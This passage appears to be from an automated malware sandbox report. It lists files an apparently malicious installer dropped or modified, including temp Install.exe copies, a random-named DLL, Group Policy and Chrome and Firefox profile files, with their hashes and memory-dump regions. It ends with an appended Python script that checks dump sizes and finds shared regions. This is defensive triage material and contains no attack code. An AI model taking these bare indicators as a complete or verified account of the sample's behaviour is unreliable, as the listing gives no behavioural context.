                                                                                                                                                                                                                      0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      e7f5f823f9e14430cb1e8dad11a3b763

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      191cf315435e05017e0cae0b7f351b35d6bd8896

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      49b132c285c25d79956054bce00df831031738accb763cae976510770ea3a141

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      e255401c8d5dd9ae55f7bcf0a9dd6bd05d6698188d9a2b8b9deea9141c5365c01a6b8333bfe5d099c63f3e1a993e2ec5e04fc5efe17f498ffc05faf517216ff3

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      34KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2cc51d551ebe9e177a08029936c2f5c1

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      48236f348f5a33fcab2233f5055e403ce445c77f

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      c3c03cbc0e8b5eb750099b17babae3267b33223dfe18ee46aacfd907f99fe42c

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      fff57e3d5498147befe408d0859c80fd9c5166c049087c27ceaedbf55b1bac7f7881dab146a3a4081256e342f653f1f79b9ca5a148fc4fc96e2103ff86a30450

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      6bf0e5945fb9da68e1b03bdaed5f6f8d

                                                                                                                                                                                                                      SHA1

eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

SHA256: dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

SHA512: 977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 12KB
  MD5: 2dd10b5dd47e86be3b5959d6cd57dc50
  SHA1: 40107258e3bad9bbe3e105395a29b6c3dea1c347
  SHA256: a546d8a0ed4d11fa9ec52c6278878fe0039d3841c0f61ed7e4acb9196837f6d9
  SHA512: b5b99776bf62066f73ce188ab6e30e30191d110cde4b82eb457aadcfee8a5e0431c0a4c32f4448c648a0e34b09049c6eac2896092b043d9647f88261ac4ba97b

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 15KB
  MD5: 36301838474d497b50c2233aaba0f32e
  SHA1: 482f140f34010ea5264bd659ac9eb548b431b7d2
  SHA256: ac5dc20c876a6e201a98cf5b17f55533c76262157006b87cb8ee068700db1aaf
  SHA512: 7a3a97c8c2cca6d0cd351baeab2737c6b6d05aa3c4357eecd66fc95ac3552d47dd34951e9425a821bb1405f10cb1c7edeb4f37cc45db48a29fee9df309d41f64

• C:\Users\Admin\AppData\Local\Temp\7zS72FD.tmp\Install.exe
  Filesize: 6.2MB
  MD5: b5bf7cc6c719be90223dc07f2688456b
  SHA1: 8bba06f5f762ab22b17a0325dae1f66db573c33e
  SHA256: 3876c068cc15a62cc6facd941c1ffee3686b8f3e29b0e5258f7d34a2d22fd8e0
  SHA512: 32f8f211bc26d197941af64fddc8b02e147335f3b1cda63dad2169af5bcbbf9f0e3489567a82d5ce4b83593ec89b7c9ba1a12e10e1b33bb7ffbfc256eea752b1

• C:\Users\Admin\AppData\Local\Temp\7zS74E2.tmp\Install.exe
  Filesize: 6.4MB
  MD5: f82b10ad392bbd43cbd81d1da4cdd6f5
  SHA1: f4adf6325e87456c49db780a7540a414717cf1f3
  SHA256: 056dc56035a562b5296aca8b8ab1dbf742c36f4d1830885ea7302944d04d1d79
  SHA512: 1d6c98715cf7e38ce21c697f0976c95c8f183a04a2f32372f58c18bb1d5881ffa67910ce96b765dab7f15cfcc983d051448c4a1b4557170c18a04ec3e2b1d616

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5fkjun5k.wbi.ps1
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.js
  Filesize: 6KB
  MD5: 5e193a7180dd5dec3a76f44b3ae5c055
  SHA1: 987b23541574d02dd0a50f284bd9612f0abf53e0
  SHA256: e81b6581ac6a26e4197dc9c0e33a0a32575c39f79dc292da6846749fff014653
  SHA512: fcfde5f2494b4d89e440c70462357c259f0488352c672abcfb0a12e8f3228ef30214a101e33b61318bf07919d483269fa6cf557f2d1526258085ed1b272b90f1

• C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 15KB
  MD5: 731f197330ce1bb790209580a9039608
  SHA1: 7d693c77f7f0fb2d1a750c433db4e77030a356eb
  SHA256: 49ac042e1b9995579bc45bd5e148b8b70c37b1ee626c8ee7dbdd72bb87c9c97d
  SHA512: 9b2793d72c9783c43a673b6cad8ef737d713ba26def67ea1c6df2ed0c3472c4976f7b51a3b245fd5e791a2cefb2f32d48d2ea25851ce24cec1dfd9f046cdd3f1

• C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 12KB
  MD5: 0036ab0af5f8b27f0568eeb062595c1b
  SHA1: e595887b9e7d00541301db5a2056b0f35e8e2712
  SHA256: 93dcb1c64c6cd6c89c835750232fae40bd90ff1d1b84308fe422a39e7e463e7f
  SHA512: f9750e84a080be36b6edc8540039875654cee1ed364db48684c352b0ee71206f2328a1a6844cd4644c38b56250f85410911ae52460d34e141162e022f7ee1a74

• C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 12KB
  MD5: 6d7718e47a9818cf53333cc09351b79e
  SHA1: b994ab469aac5201d9dc0388914fe51a341780a4
  SHA256: a4fd8f9fec3d49aa6e32f156b5e49f8bca23629d9bca9b3baa78a62a8340eada
  SHA512: 3d64d8ceeea136cf44527c081e4950d79adea311a56e69e084110814561909fa9bac11f99743c4a43175584b318e25bb19a28173a1cc9e13abe6ef851be7db60

• C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 15KB
  MD5: a350d1cb8638df2b094549cd52f52aea
  SHA1: 782d89c1043729a08b6ab54269f7c24ca06978e8
  SHA256: 683a5e25dea393102d5a7d10be015d6584a58eabf24b75e5a5bf1e9712a05730
  SHA512: 1e361edb10f951398303fbcb0ef3272a0b5b972facb982e94d05d02a685e666a4cd7152946951d5ddd87841514836fc80aebf0c6d15ff29e8f2d3d4143c76a4b

• C:\Windows\Temp\mrYrpJCpOmktZWwz\tGrdyDPQ\qKferQk.dll
  Filesize: 6.4MB
  MD5: 2ab490e0b4b1767a1780c820fea740f1
  SHA1: 81a97ba2e6b1b98d2597790f76d269e6c3d43449
  SHA256: 3bcd6700c0f9f9bb1cd2ebd1a1808bdf6dc20c19bd514d050bce73da8d555f0f
  SHA512: d7d0c37702f68cecc4ad5a49afbf05bd8c638d65b85c959811bad7cec2399c53524bead1beb98c1139effa344dce342bc77a39fa041ce580c0f861ec2feb7843

• C:\Windows\system32\GroupPolicy\Machine\Registry.pol
  Filesize: 6KB
  MD5: 03944af2fb533e34fc8b7c667db87f6e
  SHA1: 5f5d1279d331dd991e3746c81c5a3a1ca8048512
  SHA256: 957e9c63cf9807c73020a3e7c28be5d5bb40e98e6d6ef12a160a7a638dcb2783
  SHA512: 62550c136ddbe329b33d7c4d562a24e4fba11311b6d5ad8d71314c40ef729485d8ca3f1221e60ed64a11f3bebac792a95d5c8c0dc33d533085bca0727d0c0bda

• memory/692-75-0x00000000066D0000-0x000000000671B000-memory.dmp
  Filesize: 300KB

• memory/692-74-0x0000000006310000-0x0000000006660000-memory.dmp
  Filesize: 3.3MB

• memory/1592-497-0x0000000003F60000-0x0000000004543000-memory.dmp
  Filesize: 5.9MB

                                                                                                                                                                                                                    • memory/2704-103-0x0000000006B90000-0x0000000006EE0000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                    • memory/2704-105-0x0000000007510000-0x000000000755B000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                    • memory/3544-143-0x000001B1A2520000-0x000001B1A2596000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      472KB

                                                                                                                                                                                                                    • memory/3544-139-0x000001B1A2360000-0x000001B1A2382000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                    • memory/4040-178-0x0000000006450000-0x00000000067A0000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                    • memory/4056-502-0x0000000000DC0000-0x000000000142A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/4056-165-0x0000000000DC0000-0x000000000142A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/4056-11-0x0000000000DC0000-0x000000000142A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/4056-49-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                                    • memory/4204-17-0x0000000008000000-0x0000000008066000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                    • memory/4204-22-0x0000000008A40000-0x0000000008AB6000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      472KB

                                                                                                                                                                                                                    • memory/4204-14-0x0000000004EA0000-0x0000000004ED6000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      216KB

                                                                                                                                                                                                                    • memory/4204-15-0x00000000079D0000-0x0000000007FF8000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.2MB

                                                                                                                                                                                                                    • memory/4204-16-0x0000000007830000-0x0000000007852000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                    • memory/4204-18-0x00000000081C0000-0x0000000008226000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                    • memory/4204-19-0x00000000083E0000-0x0000000008730000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                    • memory/4204-20-0x00000000080D0000-0x00000000080EC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      112KB

                                                                                                                                                                                                                    • memory/4204-21-0x0000000008970000-0x00000000089BB000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                    • memory/4204-40-0x0000000009EB0000-0x000000000A3AE000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.0MB

                                                                                                                                                                                                                    • memory/4204-38-0x00000000097D0000-0x00000000097EA000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                    • memory/4204-39-0x0000000009820000-0x0000000009842000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                    • memory/4204-37-0x0000000009850000-0x00000000098E4000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      592KB

                                                                                                                                                                                                                    • memory/4344-175-0x0000000000DC0000-0x000000000142A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/4344-166-0x0000000000DC0000-0x000000000142A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/4344-71-0x0000000000DC0000-0x000000000142A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/4344-97-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                                    • memory/4880-226-0x00000000066B0000-0x00000000066FB000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                    • memory/5064-200-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                                    • memory/5064-468-0x0000000003A40000-0x0000000003AC5000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      532KB

                                                                                                                                                                                                                    • memory/5064-478-0x0000000003AD0000-0x0000000003BA7000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      860KB

                                                                                                                                                                                                                    • memory/5064-213-0x0000000001BE0000-0x0000000001C65000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      532KB

                                                                                                                                                                                                                    • memory/5064-269-0x0000000003260000-0x00000000032C2000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      392KB

                                                                                                                                                                                                                    • memory/5064-174-0x0000000000800000-0x0000000000E6A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/5064-505-0x0000000000800000-0x0000000000E6A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/5092-56-0x0000000008250000-0x000000000829B000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                    • memory/5092-54-0x0000000007B20000-0x0000000007E70000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      3.3MB
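Each dump name above encodes the process ID, a sequence number, and the start and end address of the region that was written out, so the listed Filesize can be recomputed from the address range and regions can be compared across processes. The script below is an added example and is not part of the sandbox report or its tooling: it parses the names, checks each range against the reported size (the KB/MB display convention is inferred from the values listed here and is an assumption), and groups regions that were dumped from the same address with the same size in more than one process. The entry list embedded in it is a constructed subset of the entries above.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the memory-dump entries listed in this report,
# as (dump name, listed Filesize) pairs.
SAMPLE_ENTRIES = [
    ("memory/692-75-0x00000000066D0000-0x000000000671B000-memory.dmp", "300KB"),
    ("memory/692-74-0x0000000006310000-0x0000000006660000-memory.dmp", "3.3MB"),
    ("memory/4056-11-0x0000000000DC0000-0x000000000142A000-memory.dmp", "6.4MB"),
    ("memory/4056-49-0x0000000010000000-0x00000000105E3000-memory.dmp", "5.9MB"),
    ("memory/4204-40-0x0000000009EB0000-0x000000000A3AE000-memory.dmp", "5.0MB"),
    ("memory/4344-71-0x0000000000DC0000-0x000000000142A000-memory.dmp", "6.4MB"),
    ("memory/4344-97-0x0000000010000000-0x00000000105E3000-memory.dmp", "5.9MB"),
    ("memory/5064-200-0x0000000010000000-0x00000000105E3000-memory.dmp", "5.9MB"),
    ("memory/5064-174-0x0000000000800000-0x0000000000E6A000-memory.dmp", "6.4MB"),
]

# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)


def parse_dump_name(name):
    """Split a dump name into pid, sequence number and the dumped address range."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a memory dump name: {name}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    if end <= start:
        raise ValueError(f"empty or inverted range in {name}")
    return {"pid": int(m["pid"]), "seq": int(m["seq"]),
            "start": start, "end": end, "size": end - start}


def human_size(nbytes):
    """Render a byte count the way the report lists Filesize (assumed convention:
    whole KiB below 1 MiB, otherwise MiB with one decimal)."""
    if nbytes < 1024 * 1024:
        return f"{nbytes // 1024}KB"
    return f"{nbytes / (1024 * 1024):.1f}MB"


def check_entries(entries):
    """Parse every entry; return (parsed regions, regions whose computed size
    disagrees with the listed Filesize)."""
    parsed, mismatches = [], []
    for name, listed in entries:
        region = parse_dump_name(name)
        region["listed"] = listed
        region["computed"] = human_size(region["size"])
        parsed.append(region)
        if region["computed"] != listed:
            mismatches.append(region)
    return parsed, mismatches


def shared_regions(parsed):
    """Map (start address, size) -> sorted PIDs for regions that were dumped at
    the same address with the same size in more than one process."""
    by_region = defaultdict(set)
    for r in parsed:
        by_region[(r["start"], r["size"])].add(r["pid"])
    return {k: sorted(v) for k, v in by_region.items() if len(v) > 1}


if __name__ == "__main__":
    regions, bad = check_entries(SAMPLE_ENTRIES)
    print(f"{len(regions)} regions parsed, {len(bad)} size mismatches")
    for (start, size), pids in sorted(shared_regions(regions).items()):
        print(f"0x{start:X} ({human_size(size)}) dumped from PIDs {pids}")
```

On the full list above this reports the 5.9MB region at 0x10000000 as present in PIDs 4056, 4344 and 5064 and the 6.4MB region at 0xDC0000 in 4056 and 4344. Regions that recur at the same address and size in several processes are the natural candidates to hash or diff against each other when triaging a report like this; the listing alone does not say whether their contents are identical.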
